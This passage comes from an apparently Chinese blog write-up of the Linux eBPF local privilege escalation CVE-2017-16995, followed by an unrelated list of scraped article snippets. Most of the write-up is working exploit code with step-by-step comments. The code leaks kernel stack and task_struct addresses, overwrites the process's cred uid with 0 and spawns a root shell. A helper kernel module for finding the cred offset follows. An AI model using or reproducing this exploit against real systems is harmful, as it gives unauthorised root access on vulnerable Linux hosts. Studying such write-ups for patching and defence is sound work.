		__exit(strerror(errno));
	puts("socketpair finished");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)         //将socket和map绑定,完成准备工作
		__exit(strerror(errno));
	puts("setsockopt finished");
}

//
static void writemsg(void) {
	char buffer[64];

	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %lu\n", n);
}

//用来执行已经设置好的三个功能,其中:a是放着指令号,分别对应着指令一二三,b和c分别放着操作数,0、1、2分别对应三块map
#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

//下面都是把__update_elem做了简单的封装
static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);

	return get_value(2);
}

static uint64_t __read(uint64_t addr) {
	__update_elem(0, addr, 0);

	return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
	__update_elem(2, addr, val);
}
//计算task_struct的真实地址,泄露出来的栈地址,~是取反操作
static uint64_t get_sp(uint64_t addr) {
	return addr & ~(0x4000 - 1);
}

static void pwn(void) {
	uint64_t fp, sp, task_struct, credptr, uidptr;

	fp = __get_fp();
	if (fp < PHYS_OFFSET)                                          //1.使用指令一泄露栈地址
		__exit("bogus fp");
	
	sp = get_sp(fp);
	if (sp < PHYS_OFFSET)                                          //2.通过偏移地址,计算处真实的task_struct地址所在的地址
		__exit("bogus sp");
	
	task_struct = __read(sp);                                      //3.task_struct 指令一操作,在task_struct地址所在的地址处,取出task_struct的真实地址

	if (task_struct < PHYS_OFFSET)
		__exit("bogus task ptr");

	printf("task_struct = %lx\n", task_struct);

	credptr = __read(task_struct + CRED_OFFSET);                   //4.cred 指令一操作,在cred地址所在的地址处,取出cred的真实地址

	if (credptr < PHYS_OFFSET)
		__exit("bogus cred ptr");

	uidptr = credptr + UID_OFFSET;                                 //5.uid 指令一操作,在uid地址所在的地址处,取出uid的真实地址
	if (uidptr < PHYS_OFFSET)
		__exit("bogus uid ptr");

	printf("uidptr = %lx\n", uidptr);
	__write(uidptr, 0);                                            //6.指令三操作,将0写入uid中

	if (getuid() == 0) {
		printf("spawning root shell\n");
		system("id");
		system("/bin/sh");
		exit(0);
	}

	__exit("not vulnerable?");
}

int main(int argc, char **argv) {
	prep();
	pwn();

	return 0;
}

计算偏移可以用
Makefile:

obj-m += getCredOffset.o
 
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
         
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

c:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
    int init_module()

    {
        printk("[!]current cred offset:%x\n",(unsigned long)&(current->cred)-(unsigned long)current);
        return 0;
    }
    void cleanup_module()
    {
        printk("module cleanup\n");
    }

一些小问题

我不知道为什么不能把断点打在do_check函数上面,提示我找不到这个函数,我搜了一下vmlinux和kallsyms好像确实没有,搞了一下午加一晚上都不知道哪错了,但是rebeyond师傅和P4nda师傅都可以调,就很迷茫,所以动态调试还没有完成,需要下一次补上。。补上。。。。。师傅们如果可以的话,提点一下菜鸡怎么搞。拜托拜托!

参考资料

http://p4nda.top/2019/01/18/CVE-2017-16995/
https://www.cnblogs.com/cxchanpin/p/7161821.html
https://www.cnblogs.com/rebeyond/p/8603056.html
https://www.cnblogs.com/rebeyond/p/8921307.html
https://blog.csdn.net/ljy1988123/article/details/50818421

你可能感兴趣的:(linux_kernel)

  • Linux_kernel驱动之GPIO子系统 小黄鸭- Linux_随笔笔记
    前言:gpio子系统的内容在drivers/gpio文件夹下,主要文件有:devres.c:devres.c是针对gpioapi增加的devres机制的支持gpiolib.c:gpiolib.c是gpio子系统的核心实现gpiolib-of.c:gpiolib-of.c是对设备树的支持gpiolib-acpi.c:gpio-xxx.c:目录:一、驱动流程步骤+函数分析二、驱动讲解三、驱动伪代码实现
  • Linux 驱动-3 符号导出 薛东弗斯
    通过EXPORT_SYMBOL导出aw@w:~/linux_kernel/export/a$cathelloa.c#include#includestaticintnum=100;staticvoidshow(void){printk("aaaa:num=%d\n",num);}staticinthello_init(void){printk("hello_init\n");return0;}st
  • Linux 驱动-4 模块传参 薛东弗斯
    指针变量whom指向常量hellow@w:~/linux_kernel/param$cathello.c#include#includestaticchar*whom="hello\n";staticintvar=1;staticinthello_init(void){printk("hello_init%s\n",whom);return0;}staticvoidhello_exit(void)
  • RISC-V Linux_kernel制作 杭州_燕十三 linuxrisc-v
    文章目录1、下载2、编译1、下载Linux官网地址:https://www.kernel.org$wgethttps://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.10.181.tar.xz$tarxvflinux-5.10.181.tar.xz$cdlinux-5.10.1812、编译安装依赖$sudoapt-getinstall-yflexbis
  • Linux I2C驱动分析4 - GPIO模拟I2C to_be_better_wen Linux内核学习总结linux
    一.前言在嵌入式开发中,由于芯片的I2C接口有限,或者出于硬件画板的方便,我们都需要将普通的GPIO模拟I2C接口使用。出于对这样的需求,Linux-2.6.x已经有相关代码了,Linux-3.x有标准的内核选项支持该功能,内核的代码位于linux_kernel/drivers/i2c/busses/i2c-gpio.c,本文主要介绍怎么使用i2c-gpio模块。本文的内核使用的是内核版本是lin
  • NUC970 Linux CAN 驱动问题及解决办法之一 amanda12211
    开发平台介绍:NUC970+内置CAN控制器(双通道CAN1\CAN2)+官方Linux_Kernel(少量修改)名词:版本A,问题及修改涉及两个版本,其中最旧版本称为版本A版本B,问题及修改涉及两个版本,其中较新版本称为版本B硬件设备M,项目系统内一个其它硬件设备(Meter)终端,使用NUC970的硬件异常表现:1、版本A,2018.8发现当应用程序调用can_write操作频率较高时(10m
  • NUC970 Linux CAN 驱动问题及解决办法之二 amanda12211
    开发平台介绍:NUC970+内置CAN控制器(双通道CAN1\CAN2)+官方Linux_Kernel(少量修改)名词:终端,使用NUC970的硬件异常表现:1、当CAN收发器(VP251)断电时,此时再恢复CAN外部通讯,终端表现为能收到全部的CAN数据,发送函数返回成功,但CAN总线上没有任何发送的数据显示。2、同样条件使用旧的CAN内核驱动时,竟然可以恢复通讯。分析问题:1、查询CAN资料显
  • 深度探索Linux内核之connect系统调用 杨柳
    出自:http://hi.baidu.com/linux_kernel/blog/item/ba9c32fad482fe1fa8d311d7.html下面是connect系统调用的函数原型:#include#includeintconnect(intsockfd,conststructsockaddr*serv_addr,socklen_taddrlen);man手册里面这样描述该系统调用:con
  • USB驱动之USB网络共享 weixin_33968104
    一编译USB/IP组件USB/IP组件包含两部分:USB/IP协议栈和USB/IP驱动模块USB/IP协议栈源码位于linux_kernel/tools/usb/usbipUSB/IP驱动模块位于linux_kernel/drivers/usb/usbip1.1.1编译USB/IP协议栈1进入USB/IP协议栈目录cdlinux_kernel/tools/usb/usbip2执行如下命令,生成co
  • linux kernel内核编程基础总结 墨夜风名 Linux_C_编码总结Linux_内核驱动
    Linux_kernel编程基础总结时间:2015/10/9背景:学习linux内核编程,总结学习中的经验,方便之后查看;通常我们想弄清楚linux内核是怎么样工作的,如何使用内核接口来编写linux内核代码的第一步都是搭建一个实验环境来做试验的;这里总结一下实验环境的搭建步骤,和我的一些经验;步骤一、搭建实验环境这里资源文件总共有两个:hello.cMakefileHello.c是模块的源码;M
  • NUC970 Linux CAN 驱动问题及解决办法之二 aaron511
    开发平台介绍:NUC970+内置CAN控制器(双通道CAN1\CAN2)+官方Linux_Kernel(少量修改)名词:终端,使用NUC970的硬件异常表现:1、当CAN收发器(VP251)断电时,此时再恢复CAN外部通讯,终端表现为能收到全部的CAN数据,发送函数返回成功,但CAN总线上没有任何发送的数据显示。2、同样条件使用旧的CAN内核驱动时,竟然可以恢复通讯。分析问题:1、查询CAN资料显
  • 编译模块的时候出现的莫名奇怪的错误 编译
      [root@qljt globalmem]# make -C /linux_kernel/linux-2.6.30/ M=/linux_drivers/06/globalmem/ modules make: Entering directory `/linux_kernel/linux-2.6.30' CC [M] /linux_drivers/06/globalmem
  • PCI设备驱动 三 CI
    http://hi.baidu.com/linux_kernel/blog/item/5c8510dfbfdb9b1363279884.html    为了能看到实际的运行效果,我们选择8139too网卡作为示例,从该网卡的linux驱动程序中裁剪相关代码。     一个PCI设备的驱动程序必须要向内核中的PCI核心描述自己。同时,它
  • Linux History seeu
    chapter0:起源Linux: http://en.wikipedia.org/wiki/LinuxLinuxKernel:http://en.wikipedia.org/wiki/Linux_kernel严格来讲,术语Linux只表示操作系统内核本身,但通常采用Linux内核来表达该意思。Linux则常用来指基于Linux内核的完整操作系统,包括GUI组件和许多其他实用工具。由于这些支持用户
  • 【教程】启动cubieboard2到linux_kernel(超详细) cubieboard cubieboardlinux_kernel
    之所以写这篇内容,是因为从本人入手cubieboard2以来,通过苦寻资料,在各种痛苦与错误的尝试中不断走上了”正道“,深知对于一个没有嵌入式开发基础或开发经验的普通玩家而言,想把各种环节搞清楚是一件很难的事情,故通过大量引用、参考网络内容加上自己的摸索,总结出该文,以期望对新的玩家能够有所帮助就嵌入式linux而言,整个加电——启动bootloader——启动内核——加载rootfs流程对于新手
  • 同步与异步IO、阻塞与非阻塞IO vanadiumlin 非阻塞
    同步与异步IO、阻塞与非阻塞IO (2010-04-28 10:42)分类: Linux_kernel 同步与异步IO、阻塞与非阻塞IO 很多时候我们常常看到同步与异步,阻塞与非阻塞的出现。有的地方直接将同步与阻塞画上了等号。异步与非阻塞画上了等号。事实上这是不对的。同步不等于阻塞,而异步也不等于非阻塞。下面就来仔细的看看同步与异步、阻塞与非阻塞的概念差别,及他们的组合应用。
  • 网络上收集的一些好文章 来自于IBM技术文档 zplove003 正则表达式socket网络IBM文档linux内核
    推荐一个比较权威实用的资料搜索http://www.ibm.com/developerworks/cn/views/linux/libraryview.jsplinux环境进程间通信   linux_kernel   socket以下是来自于IBM官方文档的资料,我整理了一个我看过的列表浅谈Linux内核开发之网络设备驱动 http://www.ibm.com/developerworks/cn/
  • 安装Ubuntu-10.04的时候,报找不到跟设备错,进入busybox了。。。 sonicatnoc
    其实在busybox里面能mount上的... google到了解决方法,原来给一个内核参数rootdelay=130就可以,留出时间给kernel准备一下root设备。http://www.linuxtopia.org/online_books/linux_kernel/kernel_configuration/re58.html 但是ubuntu的busybox太挫了,连个vi都没有...建议
  • PCI设备驱动知识点 wucongdonglai structModuleideinterfaceaudioCAM
        申明:此文章并非本人所写,只是加以修改和备注原帖请看:http://hi.baidu.com/linux_kernel/blog/category/pci%C9%E8%B1%B8%C7%FD%B6%AF那位大大可是个大牛人,上面有不少好东东! 一、PCI简介    PCI是一种外设总线规范。我们先来看一下什么是总线:总线是一种传输信号的路径或信道。典型情况是,总线是连接于一个或多个导体的电
  • 编译模块的时候出现的莫名奇怪的错误 qiaoliang328
    [root@qljtglobalmem]#make-C/linux_kernel/linux-2.6.30/M=/linux_drivers/06/globalmem/modulesmake:Enteringdirectory`/linux_kernel/linux-2.6.30' CC[M] /linux_drivers/06/globalmem/globalmem.oInfileinclude
  • Makfile 模板 skywalker_ll
    #Makefile2.6obj-m+=hellomod.o#产生hellomod模块的目标文件CURRENT_PATH:=$(shellpwd)       #模块所在的当前路径LINUX_KERNEL:=$(shelluname-r)#Linux内核源代码的当前版本LINUX_KERNEL_PATH:=/lib/modules/$(LINUX_KERNEL)/build#Linux内核源代码的绝
  • connect系统调用 cnctloveyu 工作socketStreamtcpstruct网络
    转自:http://hi.baidu.com/linux_kernel/blog/item/ba9c32fad482fe1fa8d311d7.html下面是connect系统调用的函数原型:    #include    #include    intconnect(intsockfd,conststructsockaddr*serv_addr,socklen_taddrlen);    man手
  • 枚举的构造函数中抛出异常会怎样 bylijinnan javaenum单例
    首先从使用enum实现单例说起。 为什么要用enum来实现单例? 这篇文章( http://javarevisited.blogspot.sg/2012/07/why-enum-singleton-are-better-in-java.html)阐述了三个理由: 1.enum单例简单、容易,只需几行代码: public enum Singleton { INSTANCE;
  • CMake 教程 aigo C++
    转自:http://xiang.lf.blog.163.com/blog/static/127733322201481114456136/   CMake是一个跨平台的程序构建工具,比如起自己编写Makefile方便很多。 介绍:http://baike.baidu.com/view/1126160.htm 本文件不介绍CMake的基本语法,下面是篇不错的入门教程: http:
  • cvc-complex-type.2.3: Element 'beans' cannot have character Cb123456 springWebgis
      cvc-complex-type.2.3: Element 'beans' cannot have character     Line 33 in XML document from ServletContext resource [/WEB-INF/backend-servlet.xml] is i
  • jquery实例:随页面滚动条滚动而自动加载内容 120153216 jquery
    <script language="javascript"> $(function (){ var i = 4;$(window).bind("scroll", function (event){ //滚动条到网页头部的 高度,兼容ie,ff,chrome var top = document.documentElement.s
  • 将数据库中的数据转换成dbs文件 何必如此 sqldbs
    旗正规则引擎通过数据库配置器(DataBuilder)来管理数据库,无论是Oracle,还是其他主流的数据都支持,操作方式是一样的。旗正规则引擎的数据库配置器是用于编辑数据库结构信息以及管理数据库表数据,并且可以执行SQL 语句,主要功能如下。 1)数据库生成表结构信息:         主要生成数据库配置文件(.conf文
  • 在IBATIS中配置SQL语句的IN方式 357029540 ibatis
    在使用IBATIS进行SQL语句配置查询时,我们一定会遇到通过IN查询的地方,在使用IN查询时我们可以有两种方式进行配置参数:String和List。具体使用方式如下: 1.String:定义一个String的参数userIds,把这个参数传入IBATIS的sql配置文件,sql语句就可以这样写: <select id="getForms" param
  • Spring3 MVC 笔记(一) 7454103 springmvcbeanRESTJSF
             自从 MVC 这个概念提出来之后 struts1.X  struts2.X   jsf 。。。。。 这个view 层的技术一个接一个! 都用过!不敢说哪个绝对的强悍! 要看业务,和整体的设计!      最近公司要求开发个新系统!
  • Timer与Spring Quartz 定时执行程序 darkranger springbean工作quartz
    有时候需要定时触发某一项任务。其实在jdk1.3,java sdk就通过java.util.Timer提供相应的功能。一个简单的例子说明如何使用,很简单: 1、第一步,我们需要建立一项任务,我们的任务需要继承java.util.TimerTask package com.test; import java.text.SimpleDateFormat; import java.util.Date;
  • 大端小端转换,le32_to_cpu 和cpu_to_le32 aijuans C语言相关
    大端小端转换,le32_to_cpu 和cpu_to_le32  字节序 http://oss.org.cn/kernel-book/ldd3/ch11s04.html         小心不要假设字节序. PC 存储多字节值是低字节为先(小端为先, 因此是小端), 一些高级的平台以另一种方式(大端)
  • Nginx负载均衡配置实例详解 avords
    [导读] 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。负载均衡先来简单了解一下什么是负载均衡,单从字面上的意思来理解就可以解 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。 负载均衡 先来简单了解一下什么是负载均衡
  • 乱说的 houxinyou 框架敏捷开发软件测试
    从很久以前,大家就研究框架,开发方法,软件工程,好多!反正我是搞不明白! 这两天看好多人研究敏捷模型,瀑布模型!也没太搞明白. 不过感觉和程序开发语言差不多, 瀑布就是顺序,敏捷就是循环. 瀑布就是需求、分析、设计、编码、测试一步一步走下来。而敏捷就是按摸块或者说迭代做个循环,第个循环中也一样是需求、分析、设计、编码、测试一步一步走下来。 也可以把软件开发理
  • 欣赏的价值——一个小故事 bijian1013 有效辅导欣赏欣赏的价值
      第一次参加家长会,幼儿园的老师说:"您的儿子有多动症,在板凳上连三分钟都坐不了,你最好带他去医院看一看。"  回家的路上,儿子问她老师都说了些什么,她鼻子一酸,差点流下泪来。因为全班30位小朋友,惟有他表现最差;惟有对他,老师表现出不屑,然而她还在告诉她的儿子:"老师表扬你了,说宝宝原来在板凳上坐不了一分钟,现在能坐三分钟。其他妈妈都非常羡慕妈妈,因为全班只有宝宝
  • 包冲突问题的解决方法 bingyingao eclipsemavenexclusions包冲突
    包冲突是开发过程中很常见的问题: 其表现有: 1.明明在eclipse中能够索引到某个类,运行时却报出找不到类。 2.明明在eclipse中能够索引到某个类的方法,运行时却报出找不到方法。 3.类及方法都有,以正确编译成了.class文件,在本机跑的好好的,发到测试或者正式环境就 抛如下异常: java.lang.NoClassDefFoundError: Could not in
  • 【Spark七十五】Spark Streaming整合Flume-NG三之接入log4j bit1129 Stream
    先来一段废话: 实际工作中,业务系统的日志基本上是使用Log4j写入到日志文件中的,问题的关键之处在于业务日志的格式混乱,这给对日志文件中的日志进行统计分析带来了极大的困难,或者说,基本上无法进行分析,每个人写日志的习惯不同,导致日志行的格式五花八门,最后只能通过grep来查找特定的关键词缩小范围,但是在集群环境下,每个机器去grep一遍,分析一遍,这个效率如何可想之二,大好光阴都浪费在这上面了
  • sudoku solver in Haskell bookjovi sudokuhaskell
    这几天没太多的事做,想着用函数式语言来写点实用的程序,像fib和prime之类的就不想提了(就一行代码的事),写什么程序呢?在网上闲逛时发现sudoku游戏,sudoku十几年前就知道了,学生生涯时也想过用C/Java来实现个智能求解,但到最后往往没写成,主要是用C/Java写的话会很麻烦。   现在写程序,本人总是有一种思维惯性,总是想把程序写的更紧凑,更精致,代码行数最少,所以现
  • java apache ftpClient bro_feng java
    最近使用apache的ftpclient插件实现ftp下载,遇见几个问题,做如下总结。 1. 上传阻塞,一连串的上传,其中一个就阻塞了,或是用storeFile上传时返回false。查了点资料,说是FTP有主动模式和被动模式。将传出模式修改为被动模式ftp.enterLocalPassiveMode();然后就好了。 看了网上相关介绍,对主动模式和被动模式区别还是比较的模糊,不太了解被动模
  • 读《研磨设计模式》-代码笔记-工厂方法模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 工厂方法模式:使一个类的实例化延迟到子类 * 某次,我在工作不知不觉中就用到了工厂方法模式(称为模板方法模式更恰当。2012-10-29): * 有很多不同的产品,它
  • 面试记录语 chenyu19891124 招聘
    或许真的在一个平台上成长成什么样,都必须靠自己去努力。有了好的平台让自己展示,就该好好努力。今天是自己单独一次去面试别人,感觉有点小紧张,说话有点打结。在面试完后写面试情况表,下笔真的好难,尤其是要对面试人的情况说明真的好难。 今天面试的是自己同事的同事,现在的这个同事要离职了,介绍了我现在这位同事以前的同事来面试。今天这位求职者面试的是配置管理,期初看了简历觉得应该很适合做配置管理,但是今天面
  • Fire Workflow 1.0正式版终于发布了 comsci 工作workflowGoogle
    Fire Workflow 是国内另外一款开源工作流,作者是著名的非也同志,哈哈.... 官方网站是 http://www.fireflow.org 经过大家努力,Fire Workflow 1.0正式版终于发布了 正式版主要变化: 1、增加IWorkItem.jumpToEx(...)方法,取消了当前环节和目标环节必须在同一条执行线的限制,使得自由流更加自由 2、增加IT
  • Python向脚本传参 daizj python脚本传参
    如果想对python脚本传参数,python中对应的argc, argv(c语言的命令行参数)是什么呢? 需要模块:sys 参数个数:len(sys.argv) 脚本名:    sys.argv[0] 参数1:     sys.argv[1] 参数2:     sys.argv[
  • 管理用户分组的命令gpasswd dongwei_6688 passwd
    NAME: gpasswd - administer the /etc/group file SYNOPSIS: gpasswd group gpasswd -a user group gpasswd -d user group gpasswd -R group gpasswd -r group gpasswd [-A user,...] [-M user,...] g
  • 郝斌老师数据结构课程笔记 dcj3sjt126com 数据结构与算法
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  • yii2 cgridview加上选择框进行操作 dcj3sjt126com GridView
    页面代码 <?=Html::beginForm(['controller/bulk'],'post');?> <?=Html::dropDownList('action','',[''=>'Mark selected as: ','c'=>'Confirmed','nc'=>'No Confirmed'],['class'=>'dropdown',])
  • linux mysql fypop linux
    enquiry mysql version in centos linux yum list installed | grep mysql yum -y remove mysql-libs.x86_64 enquiry mysql version in yum repositoryyum list | grep mysql oryum -y list mysql* install mysq
  • Scramble String hcx2013 String
    Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively. Below is one possible representation of s1 = "great":
  • 跟我学Shiro目录贴 jinnianshilongnian 跟我学shiro
    历经三个月左右时间,《跟我学Shiro》系列教程已经完结,暂时没有需要补充的内容,因此生成PDF版供大家下载。最近项目比较紧,没有时间解答一些疑问,暂时无法回复一些问题,很抱歉,不过可以加群(334194438/348194195)一起讨论问题。     ----广告-----------------------------------------------------
  • nginx日志切割并使用flume-ng收集日志 liyonghui160com
         nginx的日志文件没有rotate功能。如果你不处理,日志文件将变得越来越大,还好我们可以写一个nginx日志切割脚本来自动切割日志文件。第一步就是重命名日志文件,不用担心重命名后nginx找不到日志文件而丢失日志。在你未重新打开原名字的日志文件前,nginx还是会向你重命名的文件写日志,linux是靠文件描述符而不是文件名定位文件。第二步向nginx主
  • Oracle死锁解决方法 pda158 oracle
     select p.spid,c.object_name,b.session_id,b.oracle_username,b.os_user_name from v$process p,v$session a, v$locked_object b,all_objects c where p.addr=a.paddr and a.process=b.process and c.object_id=b.
  • java之List排序 shiguanghui list排序
       在Java Collection Framework中定义的List实现有Vector,ArrayList和LinkedList。这些集合提供了对对象组的索引访问。他们提供了元素的添加与删除支持。然而,它们并没有内置的元素排序支持。   你能够使用java.util.Collections类中的sort()方法对List元素进行排序。你既可以给方法传递
  • servlet单例多线程 utopialxw 单例多线程servlet
    转自http://www.cnblogs.com/yjhrem/articles/3160864.html 和   http://blog.chinaunix.net/uid-7374279-id-3687149.html Servlet 单例多线程 Servlet如何处理多个请求访问?Servlet容器默认是采用单实例多线程的方式处理多个请求的:1.当web服务器启动的
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他